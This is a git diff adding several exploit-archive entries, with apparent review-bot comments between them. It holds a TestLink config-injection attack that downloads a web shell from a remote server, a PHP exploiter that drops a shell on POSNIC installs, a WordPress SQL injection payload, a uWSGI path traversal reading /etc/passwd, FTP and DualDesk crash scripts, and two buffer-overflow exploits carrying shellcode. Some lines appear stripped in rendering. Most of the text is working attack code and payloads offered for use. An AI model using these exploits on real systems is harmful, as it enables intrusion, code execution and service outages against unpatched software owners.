diff --git a/exploits/hardware/webapps/44219.txt b/exploits/hardware/webapps/44219.txt
new file mode 100644
index 000000000..31d2edca0
--- /dev/null
+++ b/exploits/hardware/webapps/44219.txt
@@ -0,0 +1,22 @@
+########################################################################
+# Exploit Title: D-Link DIR-600M Wireless - Persistent Cross Site Scripting
+# Date: 11.02.2018
+# Vendor Homepage: http://www.dlink.co.in
+# Hardware Link: http://www.dlink.co.in/products/?pid=DIR-600M
+# Category: Hardware
+# Exploit Author: Prasenjit Kanti Paul
+# Web: http://hack2rule.wordpress.com/
+# Hardware Version: C1
+# Firmware version: 3.01
+# Tested on: Linux Mint
+# CVE: CVE-2018-6936
+##########################################################################
+
+Reproduction Steps:
+
+ - Goto your wifi router gateway [i.e: http://192.168.0.1]
+ - Go to --> "Maintainence" --> "Admin"
+ - Create a user with name ""
+ - Refresh the page and you will be having "PKP" popup
+
+Note: It can also be done by changing SSID name to ""
\ No newline at end of file
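Review bot: The reproduction steps at lines 25 and 28 show an empty string `""` where the injected user name and SSID value should appear, so the advisory cannot be followed as written; the markup was presumably stripped when the text was rendered and should be restored as escaped text. A one-line impact statement (the value is stored by the router and, judging by line 26, executes for whoever later opens the Admin page) and the vendor fix status would help defenders prioritise. The header block would also be clearer with an "Affected firmware"/"Fixed in" pair rather than only `# Firmware version: 3.01`.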
diff --git a/exploits/php/remote/44226.txt b/exploits/php/remote/44226.txt
new file mode 100644
index 000000000..5dbfe5a85
--- /dev/null
+++ b/exploits/php/remote/44226.txt
@@ -0,0 +1,68 @@
+# Title: TestLink Open Source Test Management(<= 1.9.16) Remote Code Execution By Manish (error1046)
+Vendor Home Page: http://testlink.org
+
+Disovered At: Indishell Lab
+
+CVE ID: CVE-2018-7466
+
+///////////
+//OverView
+///////////
+
+Testlink (Version Below 1.9.17) is vulnerable to Remote Code Execution.
+Vulnerable code is in file "install/installNewDB.php". Testlink allows user to re-install it and when user visits "/install/" directory and reachs to "Database detail" page i.e "install/installNewDB.php", user can specifiy PHP code in "TestLink DB login" field.
+After successful installation, PHP code will get save in config file.
+
+
+Exploitation
+
+During installation process, script first try to connect MySQL "root" user account (supplied by user during installation phase), if script is able to connect to MySQL server (locally or remotly hosted), process of CMS installation goes further.
+
+Script save MySQL server host, username and password in config file.
+
+Here attacker can take advantage of this process to write PHP code in config file.
+
+To do this, attacker need to setup MySQL server on a machine and MySQL server must be configure to accept connection from remote IP (which can be done easily by changing parameter in my.cnf file).
+
+To configure MySQL server open to remote connection, just open my.cnf file and do below mentioned steps
+
+ -> comment out skip-networking as well as bind-address (if any present in my.cnf )i.e change line
+
+ skip-networking
+ to
+ # skip-networking
+
+ and
+
+ bind-address = some_ip
+ to
+ #bind-address = some_ip
+
+ save the my.cnf file. reload/restart MySQL server and your mysql server will accept remote connection from any remote IP
+
+ Now, you need to configure MySQL root user in such way so that when remote script try to connect to MySQL server root user, it allows remote script.
+
+ When attacker provide credentials of a Remote MySQL server which is attacker controlled and listening for remote connection, attacker just need to specify the remote MySQL server IP, root users username, password and need to specify below mentioned PHP code in "TestLink DB login" field (or in HTTP POST parameter tl_loginname).
+
+ "box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//"
+
+ Once script establish successful connection to root user account of remote MySQL server, it will create MySQL user with name
+"box');file_put_contents($_GET[1],file_get_contents($_GET[2]));//" and will write this username name in config_db.inc.php file. After that attacker just need to need to access the config file config_db.inc.php with following GET hethod HTTP parameters
+
+ http://testlink/config_db.inc.php?1=ica.php&2=http://remote_server/php_web_shell.txt
+
+It will dump PHP web shell in base directory with name ica.php.
+
+
+
+--==[[ Greetz To ]]==--
+
+ Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
+ Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+ Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
+ Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+
+--==[[Love to]]==--
+
+ My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP
+ Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
\ No newline at end of file
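Review bot: The write-up never states a mitigation or the fixed release, although line 47 implies 1.9.17 closes the issue; a sentence near the CVE line such as "Fixed in TestLink 1.9.17; on earlier installs remove or access-restrict the `install/` directory after setup" would give defenders something actionable. The root cause described at lines 48–49 and 85 — an installer that stays reachable after installation and writes a form value unescaped into `config_db.inc.php` — is the detail operators need to check their own deployments, and it is buried under the MySQL configuration steps. Spelling in the heading block ("Disovered", "reachs", "specifiy", "hethod") should be corrected since this file becomes the canonical record.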
diff --git a/exploits/php/remote/44227.php b/exploits/php/remote/44227.php
new file mode 100644
index 000000000..107a46985
--- /dev/null
+++ b/exploits/php/remote/44227.php
@@ -0,0 +1,276 @@
+
+
';
+ }
+
+
+
+}
+
+
+
+?>
\ No newline at end of file
diff --git a/exploits/php/remote/44228.php b/exploits/php/remote/44228.php
new file mode 100644
index 000000000..6936e4866
--- /dev/null
+++ b/exploits/php/remote/44228.php
@@ -0,0 +1,242 @@
+
+
+
+
+--==[[IndiSh3LL]]==--
+
+
+
+';
+
+
+
+ echo $head ;
+ echo '
+
+
+
+
+
+
+ --==[[ POSNIC, PHP stock management script Remote code execution exploiter ]==-- --==[[ With Love from Team Indishell]]==--
+
+
+
+ ####################################################################################################################################
+ --==[[Greetz to]]==-- Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,ethicalnoob Indishell,Local root indishell,Irfninja indishell Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Gujjar PCP,Bikash,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL
+--==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,Gujjar PCP,
+Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
+--==[[Interface Desgined By]]==-- GCE College ke DON :D
+
+
+ ####################################################################################################################################
+
+
+
+
+';
+
+echo '
+ --==[[ code for India,Hack for India,Die for India ]]==--
+ Please Read it before using this code.
+';
+
+
+
+function request($lu,$payload)
+ {
+ $ch = curl_init();
+ curl_setopt($ch, CURLOPT_URL, $lu);
+ curl_setopt($ch, CURLOPT_HEADER, 0);
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+ curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
+ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+ curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
+ curl_setopt ($ch, CURLOPT_POST, 1);
+ curl_setopt ($ch, CURLOPT_POSTFIELDS, "$payload");
+ curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
+ curl_exec ($ch);
+ curl_close ($ch);
+ }
+
+function shell_check($url) {
+ $curl = curl_init($url);
+ curl_setopt($curl, CURLOPT_NOBODY, true);
+ $result = curl_exec($curl);
+ $ret = false;
+ if ($result !== false) {
+ $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
+ if ($statusCode == 200) {
+ $ret = true;
+ }
+ }
+ curl_close($curl);
+ return $ret;
+ }
+
+
+function access($lu)
+{
+ $ch = curl_init();
+
+curl_setopt($ch, CURLOPT_URL, $lu);
+curl_setopt($ch, CURLOPT_HEADER, 0);
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
+curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
+$result['EXE'] = curl_exec($ch);
+curl_close($ch);
+return $result['EXE'];
+
+}
+
+
+if(isset($_POST['launch']))
+{
+
+ $tar=$_POST['tar'];
+ $mhost=trim($_POST['mhost']);
+ $muser=trim($_POST['muser']);
+
+
+ $injecturl=$tar.'/setup_page.php';
+ $exploiturl=$tar.'/config.php';
+
+
+
+/////////////////////////////////////
+//here, we are injecting config file
+/////////////////////////////////////
+ $hex_it="select[]=1&select_box=owned&host=$mhost&username=$muser&password=\";file_put_contents(\$_POST[2],\$_POST[3]);//&dummy=1&submit=INSTALL";
+ request($injecturl,$hex_it);
+
+/////////////////////////////////////////
+///Her we go, let's dump shell on server
+////////////////////////////////////////
+ $code='';
+ $post_request='2=mannu.php&3='.$code;
+ request($exploiturl,$post_request);
+ access($tar.'/mannu.php');
+ $shell_link=shell_check($tar.'/ica.php');
+ if($shell_link==True)
+ {
+ echo 'check your shell at This link ';
+ }
+
+}
+
+
+?>
\ No newline at end of file
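Review bot: `if($shell_link==True)` at line 251 is a loose comparison against a boolean even though `shell_check()` (lines 191–204) already returns a strict bool; `if ($shell_link === true)` or simply `if ($shell_link)` is the idiomatic form. `request()` and `access()` repeat the same six `curl_setopt` calls and neither checks the `curl_exec()` return value, so a refused connection or timeout passes unnoticed; a shared helper that builds the handle and surfaces `curl_error()` would remove the duplication and the silent failure. `shell_check()` sets no `CURLOPT_CONNECTTIMEOUT`, unlike the other two functions, so an unresponsive host hangs the page. Several lines in this hunk (for example 246) appear to have lost their content in rendering, so the review covers only what is visible.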
diff --git a/exploits/php/remote/44229.txt b/exploits/php/remote/44229.txt
new file mode 100644
index 000000000..753e34a3c
--- /dev/null
+++ b/exploits/php/remote/44229.txt
@@ -0,0 +1,38 @@
+Exploit Title :WordPress Polls plugin(1.2.4) SQL Injection vulnerability
+
+Vulnerable version:<=1.2.4
+ Download Link : https://downloads.wordpress.org/plugin/polls-widget.1.2.4.zip
+
+////////////////////////
+ /// Overview:
+ ////////////////////////
+
+ WordPress Polls plugin is a tool for creating polls and survey forms. You can use polls on widgets, posts and pages. Plugin code accept answer from user using survey form. During this process, HTTP POST parameter "question_id" goes to SQL query without data senitization which arise SQL Injection vulnerability. Vulnerable code is in "fornt_end/fornt_end.php" file.
+
+
+////////////////
+
+/// POC ////
+
+///////////////
+
+ SQL Injection payload to enumerate tables
+ ----------------------------------------------
+ http://ica.lab/wp-admin/admin-ajax.php?action=pollinsertvalues
+ Post data
+ question_id=-3 union select concat(0x3c62723e3c666f6e7420636f6c6f723d626c61636b2073697a653d343e3c623e2d2d3d3d5b5b20496e64695368656c6c204c61625d5d3d3d2d2d203c62723e4461746162617365204e616d653a202d ,database(),0x3c62723e,0x446174616261736520557365723a202d20,user(),0x3c62723e,group_concat(0x3c62723e,table_name,0x7e,column_name),0x3c62723e,0x3c62723e3c62723e3c62723e),2 from information_schema.columns where table_schema=database()--&poll_answer_securety=0c7d4ce561&date_answers[0]=5
+
+
+POC
+
+
+
+ --==[[ Greetz To ]]==--
+Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
+ Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
+ Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
+ Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
+
+ --==[[ Love To ]]==--
+ My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
+ Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
\ No newline at end of file
diff --git a/exploits/php/webapps/44223.txt b/exploits/php/webapps/44223.txt
new file mode 100644
index 000000000..dbd082884
--- /dev/null
+++ b/exploits/php/webapps/44223.txt
@@ -0,0 +1,76 @@
+# Exploit Title: uWSGI PHP Plugin Directory Traversal
+# Date: 01-03-2018
+# Exploit Author: Marios Nicolaides - RUNESEC
+# Reviewers: Simon Loizides and Nicolas Markitanis - RUNESEC
+# Vendor Homepage: https://uwsgi-docs.readthedocs.io
+# Affected Software: uWSGI PHP Plugin before 2.0.17
+# Tested on: uWSGI 2.0.12 and 2.0.15
+# CVE: CVE-2018-7490
+# Category: Web Application
+
+
+OVERVIEW
+--------
+The uWSGI PHP plugin before 2.0.17 is vulnerable to Directory Traversal when used without specifying the "php-allowed-docroot" option.
+
+The vulnerability exists due to improper validation of the file path when requesting a resource under the DOCUMENT_ROOT directory which is specified via "php-docroot".
+
+A remote attacker could exploit this weakness to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f").
+
+This was tested on uWSGI 2.0.12 and 2.0.15. All versions before 2.0.17 are affected.
+
+
+DETAILS
+-------
+The documentation of uWSGI states that the php-docroot option is used to jail our php environment to a project directory (http://uwsgi-docs.readthedocs.io/en/latest/PHP.html#run-php-apps-without-a-frontend-server).
+
+ ; jail our php environment to project_dir
+ php-docroot = %(project_dir)
+
+During testing it was observed that uWSGI was affected by a Directory Traversal vulnerability when executed as a standalone (without a front-end web server) along with the "php-docroot" option to enforce the DOCUMENT_ROOT of the web application.
+
+ uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-docroot /home/testing/webapp/
+
+An attacker could exploit this vulnerability by using path traversal sequences ("..%2f") to access sensitive information as demonstrated below:
+
+ http://example.runesec.com:1337/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
+
+We noticed that when a Directory Traversal attack was performed, uWSGI was issuing the following security error:
+
+ [uwsgi-fileserve] security error: /etc/passwd is not under /home/testing/webapp or a safe path
+
+However, the contents of the requested file (i.e., /etc/passwd) were still returned to the user.
+
+After searching the web for possible solutions, we noticed that the "php-allowed-docroot" option was previously added to uWSGI for better security and could be used to list the allowed document roots but no further details were available (http://lists.unbit.it/pipermail/uwsgi/2011-December/003180.html).
+
+Upon further testing, we observed that when the "php-allowed-docroot" was used instead of the "php-docroot" option, it was not affected by Directory Traversal attacks.
+
+ uwsgi --http-socket :1337 --protocol=http --plugin php --php-index index.php --php-allowed-docroot /home/testing/webapp/
+
+After a very constructive and helpful talk with the uWSGI Project, they released an update which enforces a DOCUMENT_ROOT check when using the "php-docroot" option to prevent Directory Traversal attacks. Please see the MITIGATION section for more information.
+
+
+IMPACT
+------
+An attacker could exploit this vulnerability to gain unauthorized read access to sensitive files located outside of the web root directory.
+
+
+MITIGATION
+----------
+It is recommended to update to uWSGI 2.0.17 - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
+
+
+REFERENCES
+----------
+https://blog.runesec.com/2018/03/01/uwsgi-path-traversal/
+https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7490
+https://nvd.nist.gov/vuln/detail/CVE-2018-7490
+https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
+
+
+TIMELINE
+--------
+26 June 2017 - uWSGI Project informed about the issue
+26 February 2018 - uWSGI Project released a patch
+1 March 2018 - Exploit publicly disclosed
\ No newline at end of file
diff --git a/exploits/windows/dos/42341.c b/exploits/windows/dos/42341.c
index c3cdac3b2..a3eab1ea1 100644
--- a/exploits/windows/dos/42341.c
+++ b/exploits/windows/dos/42341.c
@@ -1,3 +1,8 @@
+/*
+Sync Breeze Enterprise BOF - Ivan Ivanovic Ivanov Иван-дурак
+недействительный 31337 Team
+*/
+
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define DEFAULT_BUFLEN 512
diff --git a/exploits/windows/dos/44221.py b/exploits/windows/dos/44221.py
new file mode 100755
index 000000000..398082287
--- /dev/null
+++ b/exploits/windows/dos/44221.py
@@ -0,0 +1,105 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security
+
+
+
+Vendor:
+=============
+www.segger.com
+
+
+Product:
+===========
+embOS/IP FTP Server v3.22
+
+
+Vulnerability Type:
+===================
+FTP Commands Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2018-7449
+
+
+Security Issue:
+================
+SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
+via an invalid LIST, STOR, or RETR command.
+
+STOR 666\r\n
+LIST\r\n
+RETR '+'..\\'*8+'Windows\system.ini\r\n
+
+
+TELNET x.x.x.x 21
+
+220 Welcome to embOS/IP FTP server
+USER anonymous
+331 Password required.
+PASS anonymous
+230 User logged in, proceed.
+STOR Bye!
+
+CRASH!!!
+
+
+
+Exploit/POC:
+=============
+import socket,time
+
+VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
+USR='anonymous'
+PWD='anonymous'
+CMD="STOR Bye!\r\n"
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((VICTIM, 21))
+print s.recv(1024) # Recieve FTP Banner
+time.sleep(1)
+s.send("USER " + USR+ "\r\n")
+print s.recv(1024)
+time.sleep(1)
+s.send("PASS "+ PWD+"\r\n") #
+print s.recv(1024)
+time.sleep(1)
+s.send(CMD)
+print 'Sent %s' % CMD
+s.close()
+
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 17, 2018
+Vendor acknowledgement: February 19, 2018
+Vendor released fixed version v3.22a : February 23, 2018
+March 1, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
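Review bot: The file is committed as an executable `.py` (mode 100755) but begins with un-commented advisory prose at line 407, so the interpreter fails on the first line; either the prose should be wrapped in a module docstring or `#` comments with the PoC at lines 460–479 left as the only code, or the advisory should ship as `.txt` with a separate script. The code itself is Python 2 only (`raw_input`, `print s.recv(1024)`, a str passed straight to `socket.send`), and there is no shebang or comment saying so; a `#!/usr/bin/env python2` line or a `# Python 2.7` comment would make that explicit. Line 442 mixes a Python string expression (`'+'..\\'*8+'`) into what otherwise reads as a protocol transcript and should be one or the other.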
diff --git a/exploits/windows/dos/44222.txt b/exploits/windows/dos/44222.txt
new file mode 100644
index 000000000..09322e1b8
--- /dev/null
+++ b/exploits/windows/dos/44222.txt
@@ -0,0 +1,85 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security
+
+
+Vendor:
+===============
+www.dualdesk.com
+
+
+
+Product:
+===========
+DualDesk v20
+
+DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your
+technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no
+configuration.
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+CVE Reference:
+==============
+CVE-2018-7583
+
+
+Security Issue:
+================
+Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application
+which listens on TCP Port 5500 by sending a long string of junk chars.
+
+(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
+eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
+eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
+cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
+ntdll!NtWaitForMultipleObjects+0x15:
+77c6016d 83c404 add esp,4
+
+
+Exploit/POC:
+=============
+Start the Dualdesk Run Proxy as Application.
+
+C:\>python -c "print 'a'*8000" > crash.txt
+
+C:\>type crash.txt | nc.exe localhost 5500
+
+Crash!!!
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: February 4, 2018
+Second attempt : February 17, 2018
+Request CVE, assigned by Mitre : March 1, 2018
+March 1, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
\ No newline at end of file
diff --git a/exploits/windows/local/38457.c b/exploits/windows/local/38457.c
new file mode 100644
index 000000000..cd4b9edf1
--- /dev/null
+++ b/exploits/windows/local/38457.c
@@ -0,0 +1,65 @@
+/*
+ASX to MP3 Converter SOF - Ivan Ivanovic Ivanov Иван-дурак
+недействительный 31337 Team
+holahola ~ https://www.exploit-db.com/exploits/38382/
+Winblows 2k3
+*/
+
+#include
+#include
+#include
+
+int main() {
+
+ int i;
+ char *overwrite_offset = malloc(255);
+ for(i = 0; i < 255; i += 5) {
+ char padding[] = "\x41\x41\x41\x41\x41";
+ memcpy(overwrite_offset + i, padding, strlen(padding));
+ }
+ memset(overwrite_offset + _msize(overwrite_offset) - 1, 0x00, 1);
+
+ char retn[] = "\x92\x72\x23\x74";
+ char shellcode[] =
+ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP sled
+ "\xdb\xc8\xd9\x74\x24\xf4\xbd\xaf\x93\x43\xb4\x5e\x31\xc9\xb1"
+ "\x52\x31\x6e\x17\x83\xee\xfc\x03\xc1\x80\xa1\x41\xe1\x4f\xa7"
+ "\xaa\x19\x90\xc8\x23\xfc\xa1\xc8\x50\x75\x91\xf8\x13\xdb\x1e"
+ "\x72\x71\xcf\x95\xf6\x5e\xe0\x1e\xbc\xb8\xcf\x9f\xed\xf9\x4e"
+ "\x1c\xec\x2d\xb0\x1d\x3f\x20\xb1\x5a\x22\xc9\xe3\x33\x28\x7c"
+ "\x13\x37\x64\xbd\x98\x0b\x68\xc5\x7d\xdb\x8b\xe4\xd0\x57\xd2"
+ "\x26\xd3\xb4\x6e\x6f\xcb\xd9\x4b\x39\x60\x29\x27\xb8\xa0\x63"
+ "\xc8\x17\x8d\x4b\x3b\x69\xca\x6c\xa4\x1c\x22\x8f\x59\x27\xf1"
+ "\xed\x85\xa2\xe1\x56\x4d\x14\xcd\x67\x82\xc3\x86\x64\x6f\x87"
+ "\xc0\x68\x6e\x44\x7b\x94\xfb\x6b\xab\x1c\xbf\x4f\x6f\x44\x1b"
+ "\xf1\x36\x20\xca\x0e\x28\x8b\xb3\xaa\x23\x26\xa7\xc6\x6e\x2f"
+ "\x04\xeb\x90\xaf\x02\x7c\xe3\x9d\x8d\xd6\x6b\xae\x46\xf1\x6c"
+ "\xd1\x7c\x45\xe2\x2c\x7f\xb6\x2b\xeb\x2b\xe6\x43\xda\x53\x6d"
+ "\x93\xe3\x81\x22\xc3\x4b\x7a\x83\xb3\x2b\x2a\x6b\xd9\xa3\x15"
+ "\x8b\xe2\x69\x3e\x26\x19\xfa\xed\xa7\x55\x71\x85\xc5\x95\x84"
+ "\xed\x43\x73\xec\x01\x02\x2c\x99\xb8\x0f\xa6\x38\x44\x9a\xc3"
+ "\x7b\xce\x29\x34\x35\x27\x47\x26\xa2\xc7\x12\x14\x65\xd7\x88"
+ "\x30\xe9\x4a\x57\xc0\x64\x77\xc0\x97\x21\x49\x19\x7d\xdc\xf0"
+ "\xb3\x63\x1d\x64\xfb\x27\xfa\x55\x02\xa6\x8f\xe2\x20\xb8\x49"
+ "\xea\x6c\xec\x05\xbd\x3a\x5a\xe0\x17\x8d\x34\xba\xc4\x47\xd0"
+ "\x3b\x27\x58\xa6\x43\x62\x2e\x46\xf5\xdb\x77\x79\x3a\x8c\x7f"
+ "\x02\x26\x2c\x7f\xd9\xe2\x5c\xca\x43\x42\xf5\x93\x16\xd6\x98"
+ "\x23\xcd\x15\xa5\xa7\xe7\xe5\x52\xb7\x82\xe0\x1f\x7f\x7f\x99"
+ "\x30\xea\x7f\x0e\x30\x3f";
+
+ int buffer_size = _msize(overwrite_offset) + strlen(retn) + strlen(shellcode);
+ char *buffer = malloc(buffer_size);
+
+ memcpy(buffer, overwrite_offset, _msize(overwrite_offset));
+ memcpy(buffer + _msize(overwrite_offset), retn, strlen(retn));
+ memcpy(buffer + _msize(overwrite_offset) + strlen(retn), shellcode, strlen(shellcode));
+ memset(buffer + buffer_size - 1, 0x00, 1);
+
+ FILE * fp;
+ fp = fopen("exploit.asx","w");
+ fprintf(fp, buffer);
+ fclose(fp);
+
+ return 0;
+
+}
\ No newline at end of file
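Review bot: The three `#include` directives at lines 618–620 carry no header name, so the file as committed does not compile; the names were presumably lost when angle brackets were rendered as HTML and should be restored (`<stdio.h>`, `<stdlib.h>` and `<string.h>` cover the `fopen`/`fprintf`, `malloc` and `memcpy`/`strlen` calls used below). `fprintf(fp, buffer)` at line 670 passes a non-literal buffer as the format string, the classic uncontrolled-format-string defect, and would interpret any `%` in the data as a conversion; `fwrite(buffer, 1, buffer_size - 1, fp)` writes the bytes as intended. Neither `malloc` result nor the `fopen` return is checked before use, and `_msize` ties the file to the MSVC CRT, which the header comment does not mention. `main()` lies wholly within the hunk.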
diff --git a/exploits/windows/local/44217.py b/exploits/windows/local/44217.py
new file mode 100755
index 000000000..7bd7ec78b
--- /dev/null
+++ b/exploits/windows/local/44217.py
@@ -0,0 +1,59 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
+# Date: 02-07-2018
+# Vulnerable Software: IrfanView 4.44 Email PlugIn
+# Vendor Homepage: http://www.irfanview.com/
+# Version: 4.44
+# Software Link: http://www.irfanview.info/files/irfanview_444.exe
+# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
+# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
+#
+# PoC
+# 1. generate irfan.txt, copy contents to clipboard
+# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
+# 3. select Options, Send by Email, Settings
+# 4. paste contents from clipboard into Full Name and select OK
+# 5. application crashes
+# 6. pop calc
+#
+
+filename="irfan.txt"
+
+junk = "\x41"*1236
+
+#jump 6
+nseh = "\xeb\x06\x90\x90"
+
+#0x10021420 : pop ebp # pop ebx # ret
+seh = "\x20\x14\x02\x10"
+
+#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c
+#Payload size: 220 bytes
+calc = (
+"\xda\xdf\xba\x32\x98\xc1\x8e\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
+"\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\x26\x7a\x34\x72\xae\xf8"
+"\xb7\x8b\x2e\x9d\x3e\x6e\x1f\x9d\x25\xfa\x0f\x2d\x2d\xae\xa3"
+"\xc6\x63\x5b\x30\xaa\xab\x6c\xf1\x01\x8a\x43\x02\x39\xee\xc2"
+"\x80\x40\x23\x25\xb9\x8a\x36\x24\xfe\xf7\xbb\x74\x57\x73\x69"
+"\x69\xdc\xc9\xb2\x02\xae\xdc\xb2\xf7\x66\xde\x93\xa9\xfd\xb9"
+"\x33\x4b\xd2\xb1\x7d\x53\x37\xff\x34\xe8\x83\x8b\xc6\x38\xda"
+"\x74\x64\x05\xd3\x86\x74\x41\xd3\x78\x03\xbb\x20\x04\x14\x78"
+"\x5b\xd2\x91\x9b\xfb\x91\x02\x40\xfa\x76\xd4\x03\xf0\x33\x92"
+"\x4c\x14\xc5\x77\xe7\x20\x4e\x76\x28\xa1\x14\x5d\xec\xea\xcf"
+"\xfc\xb5\x56\xa1\x01\xa5\x39\x1e\xa4\xad\xd7\x4b\xd5\xef\xbd"
+"\x8a\x6b\x8a\xf3\x8d\x73\x95\xa3\xe5\x42\x1e\x2c\x71\x5b\xf5"
+"\x09\x8d\x11\x54\x3b\x06\xfc\x0c\x7e\x4b\xff\xfa\xbc\x72\x7c"
+"\x0f\x3c\x81\x9c\x7a\x39\xcd\x1a\x96\x33\x5e\xcf\x98\xe0\x5f"
+"\xda\xfa\x67\xcc\x86\xd2\x02\x74\x2c\x2b")
+
+fill = "\x44"*1000
+
+buffer = junk + nseh + seh + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
